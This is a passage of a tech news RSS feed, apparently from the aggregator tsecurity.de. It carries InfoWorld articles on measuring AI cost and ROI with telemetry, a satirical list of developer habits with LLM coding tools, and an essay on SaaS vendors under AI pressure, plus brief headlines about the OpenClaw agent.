		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Leadership wants to scale AI. Budgets are tripling. Adoption is up.</p>



<p class="wp-block-paragraph">Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?</p>



<p class="wp-block-paragraph">Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data they have was never designed to produce that answer.</p>



<p class="wp-block-paragraph">Applying lessons learned from <a href="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html" data-type="link" data-id="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html">managing cloud spend</a> won’t be a fix for the AI and ROI quandary. True, cloud taught a generation of CFOs that billing without business context is noise. So to get <a href="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html" data-type="link" data-id="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html">cloud ROI</a>, they stitched two data sources together: cost data plus business data. AWS reveals which account, which region, which tag, which resource. Merge in customer and product mappings on top and the ROI of the cloud spend comes into focus.</p>



<p class="wp-block-paragraph">But AI is harder. It requires three data sources: cost, business, and telemetry—the automatic collection of data from disparate sources that helps to clarify the whole picture of what happened and why. An executive or engineering lead can have AI invoices and customer revenue. But they have no way to connect them to business value. The token count on the OpenAI invoice does not specify which customer triggered which call, which feature it served, or whether the prompt produced a business outcome. That data does not exist in the provider’s billing.</p>



<h2 class="wp-block-heading">AI providers won’t fix this problem</h2>



<p class="wp-block-paragraph">The situation is not likely to change anytime soon because AI providers are not in the business of attributing an enterprise’s costs to that enterprise’s customers. Instead, AI providers are in the business of selling tokens. The granularity they expose is the granularity their billing systems require, not the granularity a CFO requires.</p>



<p class="wp-block-paragraph">Not convinced? Compare what AWS gives you to what an AI provider gives you.</p>



<p class="wp-block-paragraph">AWS billing exposes resource IDs, account hierarchies, region, SKU, tag metadata, usage by the minute. Every dollar can be attributed to a workload, a team, a customer segment if it was tagged correctly. The data is rich enough that mature FinOps teams built unit economics on top of it years ago.</p>



<p class="wp-block-paragraph">An AI provider invoice gives you tokens consumed by model, with optional grouping by API key. That is the resolution. No request-level attribution. No customer ID. No feature mapping. No prompt outcome. No retry identification. Multi-step agent workflows collapse into a token count. Imagine a large bank receives a multi-million dollar AI invoice each month. But it has no visibility into what parts of the business were responsible for what parts of the cost so cannot allocate them.</p>



<p class="wp-block-paragraph">If an enterprise wants to know what AI cost drove which customer or feature, it has to capture that data itself, inside an application, before the call leaves it. </p>



<h2 class="wp-block-heading">Three required sources</h2>



<p class="wp-block-paragraph">Building AI ROI measurement requires three data sources, stitched together in a single model.</p>



<ol class="wp-block-list">
<li><strong>Cost data, normalized across providers.</strong> Every AI provider delivers cost differently. OpenAI invoices in one taxonomy, Anthropic in another, fine-tuning vendors and inference platforms each in their own. Cloud GPU costs sit in AWS or Azure billing. Vector database costs land in Pinecone or Snowflake invoices. None interoperate by default. Normalization is necessary but not sufficient. It will put all your AI costs in one schema. It does not tell you what they produced.</li>



<li><strong>Application-layer telemetry. </strong>This is the source most organizations are missing, and the one that makes AI ROI structurally different from cloud ROI. It requires instrumenting AI calls inside your application across six categories: request-level tracing tied to a customer or session ID; feature attribution tied to the product surface that triggered the call; agent-step capture for multi-step workflows; retry and fallback identification so recovery costs don’t get attributed to primary calls; model selection logging that records which model was chosen and why; and outcome capture that ties each call to whether it produced business value. None of this data exists in the provider’s billing. All of it has to be captured at the moment the call is made and stored in a system that can be stitched to the cost data.</li>



<li><strong>Business data. </strong>Revenue, customer segments, product hierarchies, and feature usage. The same business data already feeding your CRM and analytics stack, mapped to the customers and features the telemetry layer attributes calls to.</li>
</ol>



<p class="wp-block-paragraph">Stitched together, the three sources produce the unit economics every AI investment decision now requires: cost per customer interaction, margin per feature, profitability per agent workflow, ROI per model choice. None of these can be calculated from billing data alone. None can be calculated from telemetry alone. They require all three sources, modeled together in a way that maps cost to outcome.</p>



<h2 class="wp-block-heading">Why agentic AI makes this urgent</h2>



<p class="wp-block-paragraph">Single-call inference is the easy case. One request, one cost, one customer, one outcome.</p>



<p class="wp-block-paragraph">Agentic workflows are different. An agent decomposes a task into multiple steps. Each step calls a model. Some steps fall back to a different model when the first fails. Some steps retry on a poor result. Some steps invoke external tools that themselves cost money. A single user request can produce dozens of inference calls across multiple providers, with the cost compounding in ways the provider invoice cannot disaggregate.</p>



<p class="wp-block-paragraph">If telemetry does not capture agent-step granularity, no one will know which steps are profitable. Aggregate costs will show up three weeks later in the invoice. By then, the workflow has been running at scale, customers are onboarded, and unprofitable paths have been retried thousands of times.</p>



<p class="wp-block-paragraph">When agents make the calls, the volume of cost-generating events without business context attached grows by an order of magnitude. The window for instrumenting this before it becomes unmanageable is closing.</p>



<h2 class="wp-block-heading">What changes when the three sources come together</h2>



<p class="wp-block-paragraph">Once the three sources are stitched together, the AI investment conversation changes.</p>



<p class="wp-block-paragraph">Five different ways to build the same AI capability stop looking equivalent. They converge on adoption metrics and diverge by 10x on cost. The team picks the approach that delivers a similar business outcome at one-fifth the cost, because the team can finally see the difference. Product teams design features with margin awareness from the architecture phase, not from the post-launch budget review. Engineering teams choose model architectures with cost-per-outcome data alongside latency and quality. Leadership evaluates AI initiatives the way they evaluate any other capital allocation: on unit economics, not on the engagement chart. Aggregated invoices track the cost per customer interaction. Engagement metrics reveal margin per feature. Gut-instinct model selection is checked against real cost-per-outcome model selection results. </p>



<p class="wp-block-paragraph">Within seconds, everyone can see which AI features are profitable, which should scale, and which should be killed. This is the insight everyone is looking for and companies that achieve it will optimize the benefits of AI.</p>



<h2 class="wp-block-heading">The build trap</h2>



<p class="wp-block-paragraph">AI costs are compounding now. The board is not waiting 18 months for an internal project to reach production.</p>



<p class="wp-block-paragraph">The temptation to build it anyway has never been sharper. AI coding tools have changed what a small engineering team can ship in a quarter. The instrumentation layer looks tractable. The cost normalization looks like a weekend project. The semantic model feels like something a senior engineer could draft over a sprint.</p>



<p class="wp-block-paragraph">It is a trap. Three reasons.</p>



<p class="wp-block-paragraph">Volume is the first. A production AI footprint generates millions of telemetry events per hour, and that volume scales with agentic adoption. Real-time ingestion, correlation, and attribution at that scale is not the same problem as <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" data-type="link" data-id="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">vibe coding</a> a prototype in an afternoon. It is a permanent operational system that has to be right every minute of every day.</p>



<p class="wp-block-paragraph">The vendor landscape is the second. Cost data arrives in delayed billing windows from providers with non-interoperable schemas. Schemas change without notice. New AI providers enter the landscape monthly, each with its own taxonomy and metering. The system is not built once. It is maintained against a moving target that moves faster than most internal release cycles.</p>



<p class="wp-block-paragraph">The third is what the first two add up to: this is business-critical infrastructure. The CFO and the board are going to make capital allocation decisions on the data this system produces. When schema drift goes unnoticed for two weeks, when an agent telemetry stream stops correlating to a vendor that quietly changed its billing API, the cost of being wrong is not a sprint of cleanup. It is a quarter of misallocated capital.</p>



<p class="wp-block-paragraph">The build-vs.-buy question for engineering leaders has changed. It’s not “can we build this?” The honest answer is yes. The real question is whether the marginal hour of your strongest engineers is best spent stitching cost data to telemetry to business outcomes, or building the AI products that produce the revenue the cost data is measuring.</p>



<p class="wp-block-paragraph">The capability is reproducible in weeks. The choice is whether to spend the next 18 months building it, or the next 18 months acting on it.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.2-beta.4]]></title>
<description><![CDATA[OpenClaw 2026.7.2-beta.4]]></description>
<link>https://tsecurity.de/de/3687813/downloads/v202672-beta4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687813/downloads/v202672-beta4/</guid>
<pubDate>Thu, 23 Jul 2026 02:21:39 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.2-beta.4</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Daily Summary 2026-07-22]]></title>
<description><![CDATA[169 posts were published in the last hour 20:34 : OpenClaw security best practices for CISOs 20:34 : GitHub Cuts Public Bug Bounty Payouts, Moves Top Rewards to VIP Tier 20:4 : Third-Party SDKs Raise Privacy Questions for Apps Marketed…
Read more →
The post IT Security News Daily Summary 2026-07-...]]></description>
<link>https://tsecurity.de/de/3687676/it-security-nachrichten/it-security-news-daily-summary-2026-07-22/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687676/it-security-nachrichten/it-security-news-daily-summary-2026-07-22/</guid>
<pubDate>Wed, 22 Jul 2026 23:58:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>169 posts were published in the last hour 20:34 : OpenClaw security best practices for CISOs 20:34 : GitHub Cuts Public Bug Bounty Payouts, Moves Top Rewards to VIP Tier 20:4 : Third-Party SDKs Raise Privacy Questions for Apps Marketed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-07-22/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-07-22/">IT Security News Daily Summary 2026-07-22</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw security best practices for CISOs]]></title>
<description><![CDATA[OpenClaw has become one of the fastest adopted open source tools in recent memory. Originally released in late 2025 under the name Clawdbot, this autonomous AI agent now boasts hundreds of thousands of GitHub stars and a rapidly expanding ecosystem…
Read more →
The post OpenClaw security best pra...]]></description>
<link>https://tsecurity.de/de/3687590/it-security-nachrichten/openclaw-security-best-practices-for-cisos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687590/it-security-nachrichten/openclaw-security-best-practices-for-cisos/</guid>
<pubDate>Wed, 22 Jul 2026 23:04:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>&lt;p&gt;OpenClaw has become one of the fastest adopted open source tools in recent memory. Originally released in late 2025 under the name Clawdbot, this autonomous AI agent now boasts hundreds of thousands of GitHub stars and a rapidly expanding ecosystem…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-security-best-practices-for-cisos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-security-best-practices-for-cisos/">OpenClaw security best practices for CISOs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw security best practices for CISOs]]></title>
<description><![CDATA[OpenClaw introduces huge risks to enterprises, but employee adoption might be inevitable -- whether CISOs sanction it or not. Here's how to enable safer deployments.]]></description>
<link>https://tsecurity.de/de/3687556/it-security-nachrichten/openclaw-security-best-practices-for-cisos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687556/it-security-nachrichten/openclaw-security-best-practices-for-cisos/</guid>
<pubDate>Wed, 22 Jul 2026 22:40:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenClaw introduces huge risks to enterprises, but employee adoption might be inevitable -- whether CISOs sanction it or not. Here's how to enable safer deployments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Overengineering Your Agent Harness]]></title>
<description><![CDATA[The following originally appeared on Hugo Bowne-Anderson’s Vanishing Gradients Substack and is being republished here with the author’s permission. The conversation around harness engineering is dominated by problems from coding and personal agents such as OpenClaw, but most agents are simpler. B...]]></description>
<link>https://tsecurity.de/de/3686996/ai-nachrichten/stop-overengineering-your-agent-harness/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686996/ai-nachrichten/stop-overengineering-your-agent-harness/</guid>
<pubDate>Wed, 22 Jul 2026 18:22:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The following originally appeared on Hugo Bowne-Anderson’s Vanishing Gradients Substack and is being republished here with the author’s permission. The conversation around harness engineering is dominated by problems from coding and personal agents such as OpenClaw, but most agents are simpler. Builders should avoid over-engineering for capabilities that newer models may absorb anyway, the “Kirby […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Talk to This Glowing Pyramid on Your Desk, and It&#x27;ll Run Your AI Agent for You]]></title>
<description><![CDATA[It's a pyramid-shaped Orange Pi 4 Pro that ships with OpenClaw or Hermes preloaded and now talks back so you get that "Iron Man" feel.]]></description>
<link>https://tsecurity.de/de/3686289/unix-server/talk-to-this-glowing-pyramid-on-your-desk-and-itx27ll-run-your-ai-agent-for-you/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686289/unix-server/talk-to-this-glowing-pyramid-on-your-desk-and-itx27ll-run-your-ai-agent-for-you/</guid>
<pubDate>Wed, 22 Jul 2026 14:31:23 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's a pyramid-shaped Orange Pi 4 Pro that ships with OpenClaw or Hermes preloaded and now talks back so you get that "Iron Man" feel.]]></content:encoded>
</item>
<item>
<title><![CDATA[Seven sins of the modern software developer]]></title>
<description><![CDATA[If you ask us in an official setting, our official position is that software engineering norms still apply. Rigorous CI/CD pipelines, elegant architectural patterns, and an unyielding commitment to maintainable code remain the standard. We will use weighty words like “determinism,” “scalability,”...]]></description>
<link>https://tsecurity.de/de/3685746/ai-nachrichten/seven-sins-of-the-modern-software-developer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685746/ai-nachrichten/seven-sins-of-the-modern-software-developer/</guid>
<pubDate>Wed, 22 Jul 2026 11:04:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">If you ask us in an official setting, our official position is that software engineering norms still apply. Rigorous CI/CD pipelines, elegant architectural patterns, and an unyielding commitment to maintainable code remain the standard. We will use weighty words like “determinism,” “scalability,” “idempotency,” and “domain-driven design.”</p>



<p class="wp-block-paragraph">But behind closed doors, late at night, bathed in the glow of a dark-mode IDE, a different and more sordid reality is exposed. Hunched over the console with a manic gleam in the eye, the programmer has become power-drunk on <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">LLMs</a>. Like mad wizards casting spells, we summon the awesome powers of models and agents to satisfy our every programming whim—and commit acts of software engineering that would make <a href="https://en.wikipedia.org/wiki/Fred_Brooks">Fred Brooks</a> blush.</p>



<p class="wp-block-paragraph">Let’s just be honest about what is actually happening.</p>



<h2 class="wp-block-heading">Esoteric knowledge is superfluous</h2>



<p class="wp-block-paragraph">Forget <a href="https://www.infoworld.com/article/2335255/what-is-object-oriented-programming-the-everyday-programming-style.html">OOP</a> and <a href="https://www.infoworld.com/article/2263963/what-is-functional-programming-a-practical-guide.html">FP</a>. Forget the <a href="https://en.wikipedia.org/wiki/CAP_theorem">CAP theorem</a>, the holy crusade of <a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself">DRY</a>, and the design patterns. Honestly, you can even forget what frameworks, runtimes, and deployment platforms you are using. The AI will figure out what is best to use and understand what is already in place. We have more mental bandwidth for working on our side project (a novel about AI taking over the world). </p>



<p class="wp-block-paragraph">Of course, I exaggerate. A little.</p>



<h2 class="wp-block-heading">The docs are dead to us</h2>



<p class="wp-block-paragraph">We still say RTFM, but the truth is, we haven’t really read a page of vendor documentation since 2023. <a href="https://www.infoworld.com/article/3993482/ai-didnt-kill-stack-overflow.html">Stack Overflow</a>, once our Internet Mecca, is a husk. When a package throws a weird exception, we don’t trace the execution path or read the release notes. We highlight the red text, copy the entire 200-line stack trace, dump it into the chat, and wait for the machine to spoon-feed us the solution.</p>



<p class="wp-block-paragraph">Better yet, we just have the agentic IDE spot the error, divine a solution, and ask us if it’s OK. We might glance at the problem-solution description, if we have gone around the circle on the problem for a few cycles. Maybe. If we don’t have the agent set up for auto-confirm.</p>



<p class="wp-block-paragraph">We used to buy heavy tomes like “Rust In Action” that were more like masonry blocks than literature. Now? We just ask an AI to transliterate our JavaScript logic into Rust. We are no longer engineers methodically learning a system. We are glorified copy-paste orchestrators hoping that the stochastic parrot behind the prompt guesses the syntax correctly.</p>



<h2 class="wp-block-heading">We ignore how the back end is wired</h2>



<p class="wp-block-paragraph">We act like we meticulously designed the data flows, carefully crafted the relational constraints, and mindfully mapped the API relationships. The reality is rather more disturbing: We asked the AI to scaffold a modern deployment, hooked it up to a back-end database, and just sort of… ran it.</p>



<p class="wp-block-paragraph">It created security rules we don’t fully understand. They do seem to work, however, which is nice. </p>



<p class="wp-block-paragraph">It generated a schema that we skimmed for about four seconds. It looks reasonable.</p>



<p class="wp-block-paragraph">It wrote <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html" data-type="link" data-id="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure-as-code</a> scripts that provisioned cloud resources we are hoping don’t blow a hole in the budget. Presumably, whoever is in charge of that will manage it by stuffing the metrics into another chatbot.</p>



<p class="wp-block-paragraph">We nodded, committed the code, and went to lunch. If management asked us to manually deploy the stack from scratch, configure the environment variables, and wire the API routes without our chat window, we would give them a vacant stare.</p>



<p class="wp-block-paragraph">We understand that management is also using AI to manage the project.</p>



<h2 class="wp-block-heading">Our tests are uncomfortably incestuous</h2>



<p class="wp-block-paragraph">Test-driven development (TDD) used to be a beautiful dream, ever just beyond reach. It made us feel glorious and despondent at turns. It would burden us with sprawling dependencies if implemented too religiously. (See <a href="https://grugbrain.dev/#grug-on-testing">The Grug Brained Developer</a> in this regard.)</p>



<p class="wp-block-paragraph">But now we can attain 95% test coverage almost effortlessly. Why not just add them in while we are auto-generating everything else?</p>



<p class="wp-block-paragraph">We can now wax at length to anyone who will listen about our astounding test coverage and our automated quality assurance. Unit tests, integration tests, smoke tests, you name it. What we conveniently leave out is that the AI wrote the complex application logic, and then we asked <em>the exact same AI</em> to write the test suite to validate the code it just dreamed up.</p>



<p class="wp-block-paragraph">It is a hermetically sealed loop of algorithmic self-congratulation. The mocks, the edge case, and the assertions are an echo chamber of the model’s original assumptions. The machine is grading its own homework, giving itself an A+.</p>



<p class="wp-block-paragraph">And we are happy to accept this because, beautifully, when the code has to change, the AI will effortlessly hallucinate new tests to adapt to the churn.</p>



<h2 class="wp-block-heading">We pass off the AI’s architecture as strategy</h2>



<p class="wp-block-paragraph">AI can produce astonishing design documents. Truly breathtaking. They are cogent, they’re beautifully formatted, and they seamlessly bridge the gap between high-level business goals and granular technical specs. They even include those auto-generated sequence diagrams that wow management.</p>



<p class="wp-block-paragraph">When we present these spotless architectural proposals in the Tuesday sprint planning meeting, we lean back, take a long sip of coffee, and humbly wave away the team’s praise.</p>



<p class="wp-block-paragraph">What we don’t mention is that we spent exactly four seconds generating it.</p>



<p class="wp-block-paragraph">Are these AI-generated documents just as liable as human ones to hide severe, mortal flaws in scope and alignment? Absolutely. They might contain a foundational logic bomb that will eventually doom the entire project. But the markdown is so crisp, and the bullet points are so persuasive, that the eye just glides right over it. We will never truly know the depth of the disaster until it is far too late. But hey, we’ll burn that bridge when production catches fire. Until then, we are strategic visionaries.</p>



<h2 class="wp-block-heading">We’re addicted to vibe coding (but only in secret)</h2>



<p class="wp-block-paragraph">We loudly mock the term on social media. We roll our eyes in Slack channels when the kids on TikTok talk about <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" data-type="link" data-id="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">vibe coding</a> their new startups. We fiercely cling to our identities as hardened, serious developers who understand memory management, garbage collection, and bitwise operators. We are professionals, damn it.</p>



<p class="wp-block-paragraph">But late at night, when the managers are asleep and no one is looking? We absolutely love it. We love just throwing a chaotic, half-baked thought at the canvas, pouring a drink, and watching the AI magically build a functioning user interface based entirely on our long-deferred whims. I may finally build that working <a href="https://en.wikipedia.org/wiki/Ultima_V%3A_Warriors_of_Destiny" data-type="link" data-id="https://en.wikipedia.org/wiki/Ultima_V%3A_Warriors_of_Destiny">Ultima V</a> clone. The thrill of typing “Create an app that tracks my cryptocurrency portfolio but makes it look like the interface from Neuromancer” and having it appear 30 seconds later is heady stuff.</p>



<p class="wp-block-paragraph">The more deeply rooted in the hard, old-school realities of programming, the more profound is the joy the developer finds in the possibility of AI coding. </p>



<h2 class="wp-block-heading">We beat the problem into submission with prompts</h2>



<p class="wp-block-paragraph">Like Adam Sandler in “Uncut Gems,” we are convinced the next round will fix everything. This is us with prompts. When things are going really off the rails, instead of putting our boots on and wading into the brambles of complexity, we resort to tonal adjustments. These range from the condescending: </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">This problem is not fixed. Look at it closely. The error is right here.</p>
</blockquote>



<p class="wp-block-paragraph">To the desperate: </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">We have been working on this same problem for hours now!</p>
</blockquote>



<p class="wp-block-paragraph">To the pathetic: </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">Can’t you find a different approach to try?!</p>
</blockquote>



<p class="wp-block-paragraph">The astonishing part? It often works.</p>



<p class="wp-block-paragraph">But there is no poetry left at the bottom of the rabbit hole; it is verbal warfare. When the context window collapses, when the regressions start cascading, and when the AI stubbornly refuses to follow the most basic rules of temporal logic, the mask of professionalism drops away and something far more atavistic makes its appearance. We stop asking nicely, stop trying to understand the why, delete the pleasantries, and capslock our intent.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">What we have here is a failure to communicate! </p>
</blockquote>



<p class="wp-block-paragraph">We feed the same failing stack trace back into the prompt over and over and over again, aggressively hammering the constraints, explicitly forbidding certain libraries, and pasting in release notes just to confirm that the AI lacks the latest APIs. We force the model down a narrower and narrower path until the code finally stops throwing errors. We don’t actually debug anymore, trace variables, or step through functions. We just apply relentless, iterative pressure until the machine surrenders. We beat it into submission. And then, we push to production.</p>



<p class="wp-block-paragraph">In fact, there is a real skill here—a sheer “will to completion” that remains in the act of building software. We invest just as much time, energy, and heart wrestling the bot as we ever did emitting syntax.</p>



<h2 class="wp-block-heading">A blacker box</h2>



<p class="wp-block-paragraph">The only profession more given over to using AI like a cursed Level 13 artifact than programming is writing. Writing of course is far more open to public scrutiny than code.</p>



<p class="wp-block-paragraph">And while my tongue has been firmly in my cheek here, my faith in coders as good guys makes me more curious to see what we create than troubled by the dangers. </p>



<p class="wp-block-paragraph">It was once the case that only other programmers could understand what programmers were doing, what they were producing. Now not even that is true. Only the machine knows what the machine is doing. We just keep it tethered to our aims. Hopefully.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS will survive, but lazy SaaS is dead]]></title>
<description><![CDATA[Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? 



We already had a secure enterpri...]]></description>
<link>https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</guid>
<pubDate>Tue, 21 Jul 2026 11:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? </p>



<p class="wp-block-paragraph">We already had a secure enterprise AI environment. Building a meeting summary workflow took days, not months. We customized the outputs, injected our own internal context, and controlled security our way instead of working around someone else’s roadmap. We built it. It works better. We own it.</p>



<p class="wp-block-paragraph">That’s not a knock on those vendors. It’s a signal of something more fundamental happening across enterprise software.</p>



<h2 class="wp-block-heading">The moat was never the product</h2>



<p class="wp-block-paragraph">For two decades, <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html" data-type="link" data-id="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS</a> rode a favorable asymmetry: building internal tools was hard, integrations were messy, and even modest automation required developers and long timelines. Buying was faster and cheaper than building. That asymmetry fueled the explosion of SaaS into every corner of the enterprise stack.</p>



<p class="wp-block-paragraph">AI is collapsing that asymmetry. Large language models and agentic workflows can orchestrate APIs, move data between systems, generate interfaces, and automate business logic with a fraction of the engineering effort required even two years ago. The integration friction that once protected entire product categories is evaporating.</p>



<p class="wp-block-paragraph">The vendors most exposed are not the deeply embedded enterprise platforms. They’re the lightweight workflow layers, the products that essentially put a polished interface on top of accessible data and relatively straightforward processes. Reporting dashboards. Meeting tools. Narrow productivity applications. These products created value by simplifying implementation. That rationale is getting harder to sustain when implementation is no longer the real barrier.</p>



<p class="wp-block-paragraph">Here’s the part most analyses miss: it’s not just that AI makes development faster. It’s that agents change the integration model entirely. For 30 years, enterprise software was built for humans navigating UIs. Agentic systems don’t use UIs. They call <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a>, read from multiple sources simultaneously, and move data freely across systems. The switching costs that once made incumbent software sticky are collapsing, because an agent doesn’t care which UI it used last quarter.</p>



<h2 class="wp-block-heading">The SaaS that survives</h2>



<p class="wp-block-paragraph">The question isn’t whether SaaS survives. It’s which SaaS survives.</p>



<p class="wp-block-paragraph">The companies with durable positions are not the ones with the cleanest interface. They’re the ones that transfer operational risk customers genuinely cannot absorb themselves. Compliance. Regulatory certification. Accumulated domain expertise. Liability.</p>



<p class="wp-block-paragraph">Think about compliant invoicing across 140 countries. That’s not a workflow someone builds in a sprint. The certifications alone take years. A single regulatory change in one jurisdiction can break an AP process for a global enterprise overnight. Customers don’t pay for that capability because it’s technically complex. They pay because they cannot afford to own the risk of getting it wrong.</p>



<p class="wp-block-paragraph">That’s the distinction that matters: AI lowers the cost of building software. It does not lower the cost of absorbing risk. The vendors who understand this are building durable businesses. The ones who don’t are quietly subsidizing their customers’ internal build programs.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability.</p>



<h2 class="wp-block-heading">The prototype trap</h2>



<p class="wp-block-paragraph">The danger for enterprise buyers right now is overcorrection. Every successful prototype looks like a cost-saving opportunity. Very few survive the jump to production.</p>



<p class="wp-block-paragraph">Building a workflow with <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a> is becoming straightforward. Maintaining it is not. Models evolve. Outputs drift. Governance requirements tighten. What worked cleanly in a controlled environment behaves differently at scale, and the failure mode is worse than traditional software. Rule-based automation, when it fails, fails obviously. Agents fail silently, confidently, at scale, often with a completely reasonable-sounding explanation.</p>



<p class="wp-block-paragraph">Engineering teams that take on AI-powered systems need to solve for observability, model drift, access controls, audit trails, and long-term maintenance ownership. In regulated industries, they need to demonstrate exactly how the system reached every decision. That’s not a weekend project. That’s an ongoing operational commitment that compounds over time as models change and regulatory requirements evolve.</p>



<p class="wp-block-paragraph">Before a team decides to replace an external platform with internal AI tooling, the honest question isn’t, “Can we build this?” The real question is, “Are we prepared to own this in production, for years, as the underlying models change beneath us?” Sometimes the answer is yes. Often the answer is no, and the true cost only becomes visible after the vendor contract is canceled.</p>



<h2 class="wp-block-heading">Build vs. partner: a sharper frame</h2>



<p class="wp-block-paragraph">The build vs. buy framing has always been too binary. The right question is build vs. partner.</p>



<p class="wp-block-paragraph">Partner for the capabilities where risk transfer, regulatory complexity, and domain expertise create genuine value your team cannot replicate. Build for the capabilities that actually differentiate your business from your competitors. Don’t burn your best engineers rebuilding compliant invoice processing or production-grade document extraction. Those aren’t competitive advantages. They’re table stakes, and someone else has already paid the cost, across decades, to make them reliable.</p>



